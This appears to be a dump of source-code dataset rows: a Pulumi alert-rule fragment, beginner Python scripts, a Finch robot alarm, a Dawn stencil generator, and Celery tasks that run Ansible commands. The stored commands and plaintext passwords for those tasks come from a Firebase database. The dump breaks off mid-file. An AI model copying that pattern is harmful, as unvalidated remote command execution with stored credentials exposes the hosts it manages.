"""
Frequency (in minutes) at which the rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def query(self) -> pulumi.Output[str]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@property
@pulumi.getter(name="queryType")
def query_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "query_type")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def severity(self) -> pulumi.Output[Optional[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def throttling(self) -> pulumi.Output[Optional[int]]:
"""
Time (in minutes) for which alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> pulumi.Output[int]:
"""
Time window (in minutes) for which data needs to be fetched for the query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@property
@pulumi.getter
def trigger(self) -> pulumi.Output['outputs.ScheduledQueryRulesAlertTrigger']:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
| 46.455767 | 233 | 0.655562 | 4,834 | 41,485 | 5.444146 | 0.050683 | 0.098225 | 0.0953 | 0.045142 | 0.90717 | 0.890413 | 0.869476 | 0.850895 | 0.843751 | 0.830604 | 0 | 0.006785 | 0.239725 | 41,485 | 892 | 234 | 46.507848 | 0.827616 | 0.297553 | 0 | 0.788909 | 1 | 0 | 0.114781 | 0.051131 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16458 | false | 0.001789 | 0.012522 | 0.0161 | 0.275492 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
00c5ffe09bfcc9560113bc1d449c4e37d205be9c | 153 | py | Python | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | ["MIT"] | null | null | null | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | ["MIT"] | null | null | null | python/python_crash_course/chapter_8/print_hello.py | lmonsalve22/Learning-to-Code | 2e32eba3fbd0bd63cc539e1e6d372ca346b765c9 | ["MIT"] | null | null | null |
def print_hello(name):
    print(f'Hello {name.title()}')


def print_full_name(name, last_name):
    print(f'Hello {name.title()} {last_name.title()}')
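# Example calls (an added sketch, not part of the original exercise):
#   print_hello('eric')                 # prints: Hello Eric
#   print_full_name('grace', 'hopper')  # prints: Hello Grace Hopper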
| 21.857143 | 54 | 0.673203 | 24 | 153 | 4.083333 | 0.333333 | 0.27551 | 0.204082 | 0.306122 | 0.489796 | 0.489796 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130719 | 153 | 6 | 55 | 25.5 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
00e8e03289f4958f24944f542d8f6f56ac2cbbd4 | 143 | py | Python | test/run/t291.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | ["MIT"] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t291.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | ["MIT"] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t291.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | ["MIT"] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z |
print -3 % 2
print 3 % 2
print -3 % 3
print 3 % 3
print
print -3 % -2
print 3 % -2
print -3 % -3
print 3 % -3
print
print 0 % 1
print 0 % -1
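# Note (added): Python's % takes the sign of the divisor, so -3 % 2 == 1,
# 3 % -2 == -1, and a % b == 0 whenever a is divisible by b (0 % n == 0).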
| 9.533333 | 13 | 0.559441 | 32 | 143 | 2.5 | 0.15625 | 0.6 | 0.35 | 0.6 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0.8875 | 0 | 0.20202 | 0.307692 | 143 | 14 | 14 | 10.214286 | 0.606061 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 12 |
971ad884ab71f4b008cf17e6ca12d55127bd40a1 | 1,225 | py | Python | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | ["MIT"] | null | null | null | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | ["MIT"] | null | null | null | buzzer_test.py | raghunathreddyjangam/Python_finch2 | dc3bde4753071807a23c8a75b28909970be757d2 | ["MIT"] | null | null | null |
# Car alarm
# The finch sounds an alarm, alternating high-pitched notes and
# flashing colored lights, until its nose is turned up.
from time import sleep
from finch import Finch
finch = Finch()
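# Note: the second argument to finch_2_buzzer appears to be a note frequency in
# Hz (880 = A5, 523 = C5, ...). The repeated led/buzzer/sleep pattern below
# could be wrapped in a helper, e.g. (a sketch, not used by this script):
#   def flash(color_hex, frequency_hz):
#       finch.led(color_hex)
#       finch.finch_2_buzzer(3, frequency_hz, 60)
#       sleep(1.00)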
finch.led("#550000") # set the led to red
finch.finch_2_buzzer(3,880,60)
sleep(1.00)
finch.led("#005500") # set the led to blue
finch.finch_2_buzzer(3,493,60)
sleep(1.00)
finch.led("#000055") # set the led to red
finch.finch_2_buzzer(3,523,60)
sleep(1.00)
finch.led("#550055") # set the led to blue
finch.finch_2_buzzer(3,587,60)
sleep(1.00)
finch.led("#555500") # set the led to red
finch.finch_2_buzzer(3,659,60)
sleep(1.00)
finch.led("#005555") # set the led to blue
finch.finch_2_buzzer(3,698,60)
sleep(1.00)
finch.finch_2_buzzer(3,880,60)
sleep(1.00)
finch.led("#005500") # set the led to blue
finch.finch_2_buzzer(3,493,60)
sleep(1.00)
finch.led("#000055") # set the led to red
finch.finch_2_buzzer(3,523,60)
sleep(1.00)
finch.led("#550055") # set the led to blue
finch.finch_2_buzzer(3,587,60)
sleep(1.00)
finch.led("#555500") # set the led to red
finch.finch_2_buzzer(3,659,60)
sleep(1.00)
finch.led("#005555") # set the led to blue
finch.finch_2_buzzer(3,698,60)
sleep(1.00)
finch.halt()
finch.close()
| 21.875 | 62 | 0.72 | 245 | 1,225 | 3.502041 | 0.195918 | 0.174825 | 0.153846 | 0.237762 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0.789044 | 0 | 0.173994 | 0.127347 | 1,225 | 55 | 63 | 22.272727 | 0.628625 | 0.28 | 0 | 0.85 | 0 | 0 | 0.088812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
97a293bb2f465bf411d90d18aee11e0362c723e3 | 20,787 | py | Python | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | ["MIT"] | 20 | 2017-09-28T14:23:54.000Z | 2021-08-23T09:58:26.000Z | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | ["MIT"] | 1,018 | 2017-10-09T13:55:47.000Z | 2022-03-14T13:16:38.000Z | dawn/test/integration-test/dawn4py-tests/ICON_laplacian_diamond_stencil.py | muellch/dawn | 4fd055df809ce920ca15ffc6137b2be2aed3a2dd | ["MIT"] | 20 | 2017-09-21T10:35:24.000Z | 2021-01-18T09:24:58.000Z |
#!/usr/bin/env python
##===-----------------------------------------------------------------------------*- Python -*-===##
##                          _
##                         | |
##                       __| | __ ___      ___ ___
##                      / _` |/ _` \ \ /\ / / '_  |
##                     | (_| | (_| |\ V  V /| | | |
##                      \__,_|\__,_| \_/\_/ |_| |_| - Compiler Toolchain
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
"""Generate input for the ICON Laplacian stencil test. This is an alternative version of the diamond,
emulating an FD stencil on a FV mesh. This is the version used in operations, since it is expected
to offer second-order convergence."""
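# Typical invocation (a sketch): `python ICON_laplacian_diamond_stencil.py -v`.
# This builds the SIR below, compiles it with the C++-naive unstructured backend
# (dawn4py.CodeGenBackend.CXXNaiveIco), and writes
# ICON_laplacian_diamond_stencil.cpp to the current directory; -v also prints
# the SIR as JSON first.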
import argparse
import os
import dawn4py
from dawn4py.serialization import SIR, AST
from dawn4py.serialization import utils as serial_utils
from google.protobuf.json_format import MessageToJson, Parse
def main(args: argparse.Namespace):
stencil_name = "ICON_laplacian_diamond_stencil"
gen_outputfile = f"{stencil_name}.cpp"
sir_outputfile = f"{stencil_name}.sir"
interval = serial_utils.make_interval(
AST.Interval.Start, AST.Interval.End, 0, 0)
body_ast = serial_utils.make_ast(
[
# fill sparse dimension vn vert using the loop concept
serial_utils.make_loop_stmt(
[serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("vn_vert"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("primal_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("primal_normal_y", [True, 0])),
),
"=")],
[AST.LocationType.Value(
"Edge"), AST.LocationType.Value("Cell"), AST.LocationType.Value("Vertex")]
),
# dvt_tang for smagorinsky
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_tang"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_y", [True, 0])),
),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_tang"), serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_tang"), "*", serial_utils.make_field_access_expr("tangent_orientation")), "="),
# dvt_norm for smagorinsky
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("dvt_norm"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"u_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_x", [True, 0])),
"+", serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"v_vert", [True, 0]), "*", serial_utils.make_field_access_expr("dual_normal_y", [True, 0])),
),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double)]
),
"=",
),
# compute smagorinsky
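# (sketch of the intent: kh_smag_1 and kh_smag_2 below are the squared velocity
# gradients along the normal and tangential directions, so that further down
# kh_smag = diff_multfac_smag * sqrt(kh_smag_1 + kh_smag_2))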
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_field_access_expr("vn_vert"),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("kh_smag_1"),
"*",
serial_utils.make_field_access_expr("tangent_orientation")),
"*",
serial_utils.make_field_access_expr("inv_primal_edge_length")), "+",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_norm"),
"*",
serial_utils.make_field_access_expr("inv_vert_vert_length"))), "="),
serial_utils.make_assignment_stmt(serial_utils.make_field_access_expr("kh_smag_1"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_1"), "*", serial_utils.make_field_access_expr("kh_smag_1"))),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_field_access_expr("vn_vert"),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
"-1.0", AST.BuiltinType.Double), serial_utils.make_literal_access_expr(
" 1.0", AST.BuiltinType.Double)]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("kh_smag_2"),
"*",
serial_utils.make_field_access_expr("inv_vert_vert_length")),
"+",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("dvt_tang"),
"*",
serial_utils.make_field_access_expr("inv_primal_edge_length"))), "="),
serial_utils.make_assignment_stmt(serial_utils.make_field_access_expr("kh_smag_2"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_2"), "*", serial_utils.make_field_access_expr("kh_smag_2"))),
# combine into kh_smag; math::sqrt is forwarded as a function call below (an
# earlier note that sqrt could not be forwarded no longer applies here)
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("kh_smag"),
serial_utils.make_binary_operator(serial_utils.make_field_access_expr("diff_multfac_smag"), "*",
serial_utils.make_fun_call_expr("math::sqrt",
[serial_utils.make_binary_operator(serial_utils.make_field_access_expr(
"kh_smag_1"), "+", serial_utils.make_field_access_expr("kh_smag_2"))])),
"="),
# compute nabla2 using the diamond reduction
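# (sketch of the finite-difference form this weighted reduction assembles,
# with L_p = primal edge length and L_v = vertex-vertex length:
#   nabla2(e) ~ 4*(vn_vert_0 + vn_vert_1)/L_p^2 + 4*(vn_vert_2 + vn_vert_3)/L_v^2
#               - 8*vn(e)/L_p^2 - 8*vn(e)/L_v^2)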
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("nabla2"),
serial_utils.make_reduction_over_neighbor_expr(
op="+",
init=serial_utils.make_literal_access_expr(
"0.0", AST.BuiltinType.Double),
rhs=serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"4.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn_vert")),
chain=[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")],
weights=[
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
'*',
serial_utils.make_field_access_expr(
"inv_primal_edge_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
'*',
serial_utils.make_field_access_expr(
"inv_primal_edge_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
'*',
serial_utils.make_field_access_expr(
"inv_vert_vert_length")),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
'*',
serial_utils.make_field_access_expr(
"inv_vert_vert_length")),
]
),
"=",
),
serial_utils.make_assignment_stmt(
serial_utils.make_field_access_expr("nabla2"),
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr("nabla2"),
"-",
serial_utils.make_binary_operator(
serial_utils.make_binary_operator(serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"8.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn")), "*",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_primal_edge_length"),
"*",
serial_utils.make_field_access_expr(
"inv_primal_edge_length"))),
"+",
serial_utils.make_binary_operator(serial_utils.make_binary_operator(serial_utils.make_literal_access_expr(
"8.0", AST.BuiltinType.Double), "*", serial_utils.make_field_access_expr("vn")), "*",
serial_utils.make_binary_operator(
serial_utils.make_field_access_expr(
"inv_vert_vert_length"),
"*",
serial_utils.make_field_access_expr(
"inv_vert_vert_length"))))),
"=")
]
)
vertical_region_stmt = serial_utils.make_vertical_region_decl_stmt(
body_ast, interval, AST.VerticalRegion.Forward
)
sir = serial_utils.make_sir(
gen_outputfile,
AST.GridType.Value("Unstructured"),
[
serial_utils.make_stencil(
stencil_name,
serial_utils.make_ast([vertical_region_stmt]),
[
serial_utils.make_field(
"diff_multfac_smag",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value(
"Edge")], 1
),
),
serial_utils.make_field(
"tangent_orientation",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"inv_primal_edge_length",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"inv_vert_vert_length",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"u_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"v_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"primal_normal_x",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"primal_normal_y",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"dual_normal_x",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"dual_normal_y",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"vn_vert",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge"), AST.LocationType.Value(
"Cell"), AST.LocationType.Value("Vertex")], 1
),
),
serial_utils.make_field(
"vn",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"dvt_tang",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"dvt_norm",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag_1",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag_2",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"kh_smag",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
serial_utils.make_field(
"nabla2",
serial_utils.make_field_dimensions_unstructured(
[AST.LocationType.Value("Edge")], 1
),
),
],
),
],
)
# print the SIR
if args.verbose:
print(MessageToJson(sir))
# compile
code = dawn4py.compile(sir, backend=dawn4py.CodeGenBackend.CXXNaiveIco)
# write to file
print(f"Writing generated code to '{gen_outputfile}'")
with open(gen_outputfile, "w") as f:
f.write(code)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-v", "--verbose", dest="verbose", action="store_true", default=False, help="Print the generated SIR",
)
main(parser.parse_args())
| 51.9675 | 152 | 0.493337 | 1,837 | 20,787 | 5.127926 | 0.095808 | 0.212527 | 0.288217 | 0.205945 | 0.851486 | 0.850955 | 0.836093 | 0.835881 | 0.829512 | 0.828662 | 0 | 0.008673 | 0.406504 | 20,787 | 399 | 153 | 52.097744 | 0.754884 | 0.052004 | 0 | 0.74221 | 0 | 0 | 0.074841 | 0.0116 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002833 | false | 0 | 0.016997 | 0 | 0.01983 | 0.005666 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8ae760495c84700608a6b43289df14d01ab87ede | 106 | py | Python | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | ["MIT"] | 62 | 2018-11-30T05:53:32.000Z | 2022-03-20T13:15:22.000Z | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | ["MIT"] | 35 | 2021-04-12T09:41:05.000Z | 2022-03-26T13:32:46.000Z | drivers/xarm/core/__init__.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | ["MIT"] | 43 | 2019-01-03T04:47:13.000Z | 2022-03-18T06:40:59.000Z |
from .config.x_code import ControllerWarn, ControllerError, ServoError
from .config.x_config import XCONF
| 35.333333 | 70 | 0.849057 | 14 | 106 | 6.285714 | 0.642857 | 0.227273 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09434 | 106 | 2 | 71 | 53 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8ae8e69ef5d251329dd2635a03e5a08569a7ab7b | 6,462 | py | Python | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | ["Apache-2.0"] | 2 | 2015-02-22T08:02:03.000Z | 2017-09-07T07:18:12.000Z | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | ["Apache-2.0"] | null | null | null | dcelery/tasks.py | rackeric/destiny | 558360b8465bb8f1b89a9adc20e81a2648b93b9d | ["Apache-2.0"] | null | null | null |
from firebase import FirebaseApplication, FirebaseAuthentication
#from firebase import Firebase
import firebase
from celery.decorators import task
from ansible import utils
import ansible.runner, json, os
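# A caller would enqueue these tasks from application code, e.g. (a sketch,
# not part of this module; job_id and user_id are placeholders):
#   from dcelery.tasks import ansible_ping
#   ansible_ping.delay(job_id, user_id)  # runs asynchronously on a Celery worker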
@task()
def ansible_jeneric_testing(job_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
URL = 'https://deploynebula.firebaseio.com/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHostList = job['host_list'] +','
myModuleName = job['module_name']
if (job['module_args']):
myModuleArgs = job['module_args']
else:
myModuleArgs = ''
myPattern = job['pattern']
myRemoteUser = job['remote_user']
myRemotePass = job['remote_pass']
#myKeyFile = job['private_key_file']
#tmpFile = open("/tmp/" + job_id, "w")
#tmpFile.write(myKeyFile)
#tmpFile.close()
results = ansible.runner.Runner(
pattern=myPattern,
forks=10,
module_name=myModuleName,
module_args=myModuleArgs,
remote_user=myRemoteUser,
remote_pass=myRemotePass,
host_list=myHostList
#private_key_file='/tmp/keykey'
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
#if type(results) == dict:
# results = utils.jsonify(results)
# post results to firebase (Runner.run() returns a dict, so pass it directly;
# json.loads() would raise a TypeError on a dict)
myExternalData.post(job_id + '/returns', results, {'print': 'pretty'}, {'X_FANCY_HEADER': 'VERY FANCY'})
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_jeneric(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHostList = job['host_list'] +','
myModuleName = job['module_name']
myModuleArgs = job['module_args']
myPattern = job['pattern']
myRemoteUser = job['remote_user']
myRemotePass = job['remote_pass']
runString = ""
for arg in myHostList, myModuleName, myModuleArgs, myPattern, myRemoteUser, myRemotePass:
if ( arg ):
runString = runString + arg
results = ansible.runner.Runner(
pattern=myPattern,
forks=10,
module_name=myModuleName,
module_args=myModuleArgs,
remote_user=myRemoteUser,
remote_pass=myRemotePass,
host_list=myHostList,
).run()
# (older runner invocation, kept commented out for reference)
#results = ansible.runner.Runner(
# pattern=myHost, forks=10,
# module_name='command', module_args=myCommand,
#).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
if type(results) == dict:
results = utils.jsonify(results)
# post results to firebase
myExternalData.post(job_id + '/returns', results)
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_command_run(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHost = job['host']
myCommand = job['command']
# run the ansible job
results = ansible.runner.Runner(
pattern=myHost, forks=10,
module_name='command', module_args=myCommand,
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
